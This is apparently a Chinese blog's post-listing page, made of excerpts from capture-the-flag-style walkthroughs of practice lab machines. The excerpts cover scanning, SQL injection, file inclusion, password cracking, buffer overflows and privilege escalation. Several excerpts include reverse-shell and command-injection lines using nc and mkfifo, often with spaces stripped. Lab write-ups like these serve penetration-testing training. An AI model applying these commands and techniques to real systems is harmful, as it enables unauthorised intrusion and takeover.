- 博客(31)
- 收藏
- 关注
原创 Burpsuite Unsupported or unrecognized SSL message问题解决方案
但是抓百度这种https网站没问题 抓http网站默认解析成https导致报错。在此处关闭掉安全连接即可。
2024-10-22 15:39:02
1419
原创 Vegeta靶机打靶过程及思路
7.发现/etc/passwd目录下可以写,写入一个管理员账号,成功拿到root权限,打靶完成。3.使用zbarimg工具进行读取但是没有得到任何有效信息,解码得到的文字并不是登录密码。4.再次使用超大型字典进行扫描,发现bulma这个极为隐蔽的目录,音频是一段摩尔电码。2.发现只有80端口可以突破,于是进行大字典的扫描,得到某个目录下存在一张图片。5.对该摩尔电码进行解码,得到用户名和密码。6.ssh登录成功突破,打点完成。1.常规端口扫描及发现。......
2022-07-21 14:43:31
350
原创 dawn靶机打靶过程及思路
5.执行mysql命令,sudo-uroot-p,输入之前命令历史内的hash破解之后的值,成功进入。6.利用find发现zsh具有root权限,输入zsh,zsh也具有root权限,成功得到root权限。3.针对3306端口的服务嗅探失败,针对80端口的目录发起扫描,发现日志里面存在一个。周期性的程序,创建一个相同名称的shell脚本,写入反弹shell的指令。4.成功突破边界进入系统,开始进行提权,首先查看命令历史,发现。符号中间没有信息,说明没有加盐,提示sudo-l命令。...
2022-07-21 12:15:12
1337
原创 Tre靶机打靶过程及思路
4.利用mantis密码重置漏洞进入到后台管理界面,在manage功能下再次发现ssh可登录的账号密码。3.访问到敏感目录下sysytem下的数据库账号配置文件,利用该账号进入数据库查看到可疑账号密码,2.访问到401认证界面,弱口令修改之后登录成功,利用mantis最新版本rce突破外围打点成功。5.查找其他账号下具有可写的root权限文件,找到一个系统的shell脚本,修改该脚本内容。6.成功得到shell,成功得到root权限,打靶完成。,ssh登录得到该账号,外围突破完成。1.常规端口及服务发现。.
2022-07-21 11:40:15
1102
原创 Funbox2打靶过程及思路
ssh-iid_rsatom@192.168.182.135-t“bash--noprofile”但是失败。3.匿名可以登录ftp服务器,通过searchsploit搜素到版本存在proftp1.3.5的exp,但是。6.查看到.mysql_history下的tom账号密码,可以直接suroot拿到flag。7.或者sudo-s得到root权限,但是cd命令受限,是因为是rbash权限,尝试进行。5.john依次爆破所得的压缩包,通过tom压缩包解压得到的私钥成功登录服务器。...
2022-06-30 17:27:28
899
原创 school靶机打靶过程及思路
编辑poc验证存在缓冲区溢出漏洞,通过缓冲区调试成功拿下root账号的权限,打靶完成。2.访问80端口是一个登录界面,使用hydra爆破或者万能密码均能直接进入后台。将php木马修改后传上去,开启侦听端口,访问得到反弹shell,突破外围成功。4.发现access程序开了23端口,将改文件放到win8上面进行调试。3.在访问注释里面的地址后后台出现文件上传的功能。爆破得到密码admin123。1.常规端口及服务发现。...
2022-06-27 14:37:51
548
原创 darkhole_2靶机打靶过程及思路
6.使用3493进行提权失败,查看账号目录下的.bash_history,提示发现命令执行,且提示开放了9999。7.发现该账号的命令执行历史记录下提示存在该账号存在sudo权限,输入history记录下的密码,成功执行。4.发现后台页面url地址上有id=1,推测存在sql注入,手工进行union联合注入,得到账号密码。再次查看login.php,里面存在默认用户名和密码,回到首页登录成功,成功进入后台。,访问该路径,成功执行命令,执行反弹语句,成功拿到losy账号权限。成功得到root账号的权限。...
2022-06-25 15:07:32
613
原创 Presidential靶机打靶过程及思路
4.在user表中得到账号密码,查看/README版本信息,为4.8.1,使用searcchsploit搜索4.8.1,5.使用刚才搜索到的文件包含漏洞,执行语句后,将获得的session值填入,发现phpinfo执行。访问到config.php.bak的页面源码的数据库账号与密码,ssh爆破失败。2.发现web页面存在子域名,绑定域名,用dirsearch进行子域名爆破,发现存在与一个rce,使用该脚本攻击目标域名,但是发现无法正常使用。打开查看到root账号的密码为密文,对该密码进行爆破失败。...
2022-06-22 15:34:51
433
原创 Raven2靶机打靶过程及思路
1.常规端口及服务发现2.在80端口的blog发现新域名,绑定该域名,发现该网站为wordpress但是扫描并没有发现有效信息路径爆破发现vendor目录列出了所有路径,继续扫描发现存在一个uploads路径,访问得到第一个flag3.发现phpmailer会发送邮件,版本为5.2.16,searchsploit搜索rce的exp,了解原理后修改exp后运行exp./40968.sh 10.0.2.27 但是攻击失败,使用另外一个python的exp发现成功,在本机开启侦听端口反弹shell成功,突
2022-06-21 14:08:11
152
原创 tomato靶机打靶过程及思路
5.反弹shell成功,开始进行提权,查看到内核版本为16.04可以进行内核版本提权,提权成功拿下root权限,打靶完成。3.发现info.php提示文件包含,读取到/var/log/auth.log,可以用ssh登录传入一句话木马,2.ftp端口没有可利用的方法,路径爆破80端口,发现路径目录antibot_image下有路径。用蚁剑连接,还查看/home/tomato/.ssh/id_rsa没有发现公私钥信息。-i&32>&3);1.常规端口及服务发现。...
2022-05-30 14:18:57
504
原创 Cereal打靶过程及思路
发现/back_en/路径,继续爆破备份路径,发现存在一个/back_en/index.php.bak文件,尝试。发现/usr/share/scripts/chown.sh这个脚本可疑,再次尝试获取到新的shell后,查看。3.80端口首页面没有收获,dirb路径爆破得到admin登录页面,爆破失败,blog页面下提示绑带。检查主页面后没有发现,然后进行路径爆破,也都没有查到备份文件和敏感目录。发现存在一个子域名,再次修改hosts文件绑定域名,访问该子域名。...
2022-05-26 16:46:32
178
原创 Gemini-Pentest v2靶机打靶过程及思路
5.成功访问命令执行页面,但是过滤了空格符号,使用tab空格符号绕过,对应编号为%09,尝试nc命令失败。wgethttp//10.0.2.25/usr/bin/nc-O/tmp/nc-O意思是输入到目标目录。2.查看源码发现会使用token来校验,使用dirb来进行路径爆破,在registration.php。在md5hashing.net网站破解得到管理员账号密码,登录进去发现一个命令执行选项,页面下存在注册页面,还有activate页面可以找到激活码,开始进行激活码爆破。...
2022-05-24 13:35:32
498
原创 Gemini-Pentest靶机打靶过程及思路
发现gemini2账号下存在/bin/bash执行权限,读取/var/www/html/tese2/inc/setting.php下的数据库账号密码。5.读取到私钥信息,读取authorized_keys,发现信息提示可以使用公钥私钥来登录,再次读取id_rsa.pub公钥文件,,发现pdf界面下使用的时候wkhtmltppdf组件,可以将html代码转换成pdf,搜索发现。可以加载js代码,存在xss漏洞,看到url地址里面存在uid数字,测试但是不存在sql注入。发现最终显示成功,读取到目标文件内容。.
2022-05-21 15:32:05
450
原创 narak靶机打靶过程及思路
使用hydra进行爆破hydra-Ldict.txt-Pdict.txt10.1.8.133http-get/webdav-v后面的意思是使用http。继续查找文件find/-typef-userroot-perm-ug=x,o=w-execls-l‘{}’;上传反弹shell的php文件/usr/share/webshells/php/php-reverse-shell.php。使用CVE-2021-3493漏洞进行提权,提权成功拿下root账号。...
2022-05-19 20:01:22
359
原创 pyexpvm靶机打靶过程及思路
执行语句selectload_file(‘/etc/passwd’)发现一个名为lcuy的账号。5.查看mysql数据库的表与数据,表名为fernet,是一种python下的加密算法。2.没有开放web服务,但是开启了22端口的ssh服务以及mysql的3306端口。mysql-uroot-h10.1.8.128-p输入密码连接成功。尝试查看其他可以存在有效信息系统文件路径文件,查看lucy下的公钥文件也不存在。sudo-l查看到exp这个py文件存在root权限文件。...
2022-05-18 15:15:20
284
原创 Momentum靶机打靶过程及思路
直接解密,https//codepen.io/omararcus/pen/QWwBdmo,得到解密后的内。3.发现main.js下存在注释,其中有解密用的秘钥,在cryptojsexample平台上可以。5.开始进行提权,利用内核漏洞进行提权均失败,查看到etc/passwd下存在redis账号,GETrootpass得到一个密码,su后成功切换到root权限打靶完成。ss-pantu查看靶机开放的所有端口,发现6379端口确实开放。4.思考到可能为账号密码,ssh登录尝试成功,外围打点完成。...
2022-05-16 17:20:57
227
原创 Ripper靶机打靶过程及思路
再次执行find/-usercubes-typef-execls-la{};find/-usercubes-typef-execls-la{};3.在80端口访问rips路径发现存在,开始进行扫描/var/www/目录下文件。发现webmin文件下有备份文件,miniser.log文件日志发现账号登录密码。6.在others下面有命令行界面,权限为root权限成功,拿下第二个flag。发现secret.file文件下存在一个密码,su成cubes账号成功。...
2022-05-15 14:37:16
393
原创 Nagini靶机打靶过程及思路
curl--proto‘=https’--tlsv1.2-sSfhttp//sh.rustup.rc|sh选择1后继续回车。showtables;将生成的payload输入得到表数据,发现users表,3.修改hosts文件,绑定域名,后ping通发现可以访问,但是返回的结果是相同的,使用cloudflare。ssh登录成功,得到第一个flag,得到第二个flag需要提权到horcrux账号。发现note.txt下存在提示信息,使用http3访问服务器,存在一个域名。...
2022-05-12 21:16:28
857
原创 doubletrouble靶机打靶过程及思路
4.searchsploitqdpm9.1发现存在rce漏洞需要登录使用,使用默认密码进行登录,但。9.使用ssh进行登录目标系统账号密码,尝试用第二个账号密码登录ssh时发现成功,先进行万能密码测试’or1=1#失败,查看源码也没有收获,再次进行路径爬取。但是也没有得到有效的信息,使用bp抓包放回包,使用时间盲注得到不一样的注入。执行成功上传了一个后门文件,使用nc反弹shell成功,升级shell后。将数据包保存下来,使用sqlmap进行注入成功,使用得到的账号密码均失败。...
2022-05-10 20:46:10
642
原创 Fawkes靶机打靶过程及思路
payload=‘A’*112+‘B’*4+‘\x90’*32+‘C’*32加x90是空指令,是为了程序的执行更加的顺滑。2.80端口没有得到任何有用的信息,21端口ftp可以匿名登录,登录进之后发现一个可以下载的文件。,下载后保存到本机并运行程序,在本机进程里发现运行成功,最后本机上开放了9898端口,运行后。执行脚本发现成功精确写入四个B,尝试在eip中写入跳转到esp的汇编指令,在esp中执行一个。8.手动修改代码,将sudo路径修改为/usr/bin/sudo,再次在靶机上执行程序,...
2022-05-08 20:21:37
1099
原创 Billu_b0x靶机打靶过程及思路
后台界面,继续用dirsearch扫描phpmy目录,查看config.ini.php文件,拿到root账号密码,用root账号。4.查看c.php得到数据库账号密码,访问phpmy.php,是phpmyadmin,拿账号密码登录成功进入php。4.使用dirsearch进行路径爆破,访问add.php,发现存在图片上传的点,通过对add页面功能的。再次上传尝试执行看是否能执行图片里面的代码,发现反弹成功,拿到shell,对shell进行常规的。or%200%3d0%20#%5c登录进入后台。...
2022-05-05 15:26:12
334
2
原创 hacksudo靶机打靶过程及思路
3.注释里面有一个cgi-bin可以使用外部应用程序,此时通擦汗那个会存在一个cgi-bin的文件夹。sudocat/etc/shadow发现可以查看密码文件,但是需要考虑到可能破解需要很多的时间。执行脚本sudo-uthor/home/thor/./hammer.sh。发现第二个问题时可以执行输入的系统指令输入bash得到thor的shell。4.查看所有的后缀名为cgi,sh的文件,使用破壳漏洞尝试控制系统。sudo-l发现thor目录下有一个可以执行的shell脚本。...
2022-05-03 16:28:19
1021
原创 Vikings靶机打靶过程及思路
ss-pantu|grep18812发现开启,并且是本机127.0.0.1,所以代码需要在靶机上运行。7.将数字进行ASCII编码还原,将得到的字符串进行ssh登录,发现进入后进行自动sudo。先bin/bash-i进行提权,查看运行脚本的文件,里面运用了rpyc远程管理。boat文件里面给出提示是考拉兹猜想,进行质数查找,编写简单的素数判断程序。5.发现解压后有图片文件,思考是否有隐写数,使用工具进行探测隐写。侦探发现是一个zip压缩文件,下载保存后进行解压发现需要密码。...
2022-05-02 14:46:28
896
原创 y0usef靶机打靶过程及思路
2.查看是否存在易读的文件发现没有,查看网站源码也没有,使用whatweb侦探网站指纹。4.通过弱口令两个admin进入后台发现文件上传的点,但是存在基础的过滤。查看home下的目录发现一个文件,base64解密后发现一个账号密码。更改content-type为image/png发现可以绕过过滤。5.蚁剑连接shell,在页面上进行参数执行获取反弹shell成功。sudo-l查看有root的权限发现可以运行所有程序。3.大部分页面403,做403页面绕过。然后查看/etc/passwd下的账号。...
2022-04-27 20:26:04
2499
原创 Hacker_kid靶机打靶过程及思路
下载利用权限利用的python进程注入脚本wgethttps//gist.githubusercontent.com/wifisecguy/1d69839fe55c36a1dbecca66948ad56/raw/e919439010bbabed769d86303ff18ffbacdaecfd/inject.py。7.挨个读取后,在读取/home/saket/.bashrc时没有回显,使用php封装器读取,然后进行解码。,发现得到用户名和密码,在登录处登录失效,尝试使用saket作为用户名登录。...
2022-04-25 21:27:52
1737
原创 Evilbox-One靶机打靶过程与思路
没有有效信息,思考是否可能有写入权限,php//filter/write=convert.base64-decode/resource=test.php&txt=MTIz。-wval.txtVAL-uhttp//10.0.2.26/secret/evil.php?/home/mowree/.ssh/id_rsa。查找suid文件权限find/-perm/40002>/dev/null4000是suid权限位置,后面是将报错文件放置到空白目录中。/etc/passswd。...
2022-04-21 20:29:34
2601
原创 hard_socnet2靶机打靶过程及思路
mkfifo/tmp/f;以及sysytem函数,backdoor函数,继续disasvuln查看vuln函数的汇编代码,发现里面使用了strcpy。函数,可能存在缓冲区溢出的一个c语言函数,disasbackdoor查看汇编代码,发现使用了一个setuid函数。一个内建函数,是一个自定义函数,infofunction查看当前应用程序的使用函数信息,发现setuid函数。内建函数,break*地址,添加断点,命令s单步执行,继续观察,观察到vuln-弱点,这个单词,发现不是。...
2022-04-16 21:55:46
2313
原创 AdmX_new靶机打靶过程及思路
pty.spawn(“/bin/bash”)’利用数据库密码登录wpadmin发现失败,开始登录数据库,mysql-uadmin-pWp-Admin#123。sudo发现一个文件有sudo权限,使用命令输入最开始的密码,登录进的数据库拥有root权限,思考使用数据库提权,查看wp-config.php下的数据库账号密码,尝试密码复用的可能性,想到最开始的登录界面的管理员账号密码,拿过来尝试su发现成功,获取到第一个flag文件。9.仍然尝试在404页面插入一句话木马,用蚁剑连接获得新的shell,...
2022-04-11 15:38:52
2567
原创 Chronos靶机打靶过程与思路
1.常规主机侦探,sudonetdiscover-r10.0.2.0/162.常规端口和服务侦探3.cyberchet解码器,针对js代码4.发现一个本地域名解析地址,修改etc下的hosts文件对应地址解析5.bp抓包后在cyberchef平台上解码发现为base58编码,是一串时间的函数执行,所以考虑使用命令执行6.编码后提交nc串联攻击获得反弹shell,开始代码审计,最后发现node.js下的express-fileupload模块。...
2022-04-06 22:13:10
3443
原创 easy_cloudantivirus靶机打靶过程及思路
5.侦听4444端口通过连接获得shellnc10.0.2.44444-e/bin/bash-e的参数的作用是执行成功之后运行shell,发现。./update_cloudav“a|nc10.0.2.45555|/bin/bash|nc10.0.2.46666”进行suid。6.nc10.0.2.43333|/bin/bash|nc10.0.2.44444nc串联攻击。2.发现留言板后,两个思路,第一个思路是进行暴力破解,第二个思路是通过。...
2022-04-04 21:28:02
2207
原创 medium-socnet靶机打靶过程及思路
1.cp/usr/share/exploitdb/exploits/linux/remote/36337.py.------复制代码到根目录下。2.查看目标端口的服务信息proxychainsnmap-p22,5000-sT-sV-Pn172.17.0.1。2.使用脚本开始攻击------proxychainspython236337.py172.17.0.2。⑦ssh登录john----sshjohn@10.0.2.5准备进行提权操作。...
2022-04-02 20:32:34
4010
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人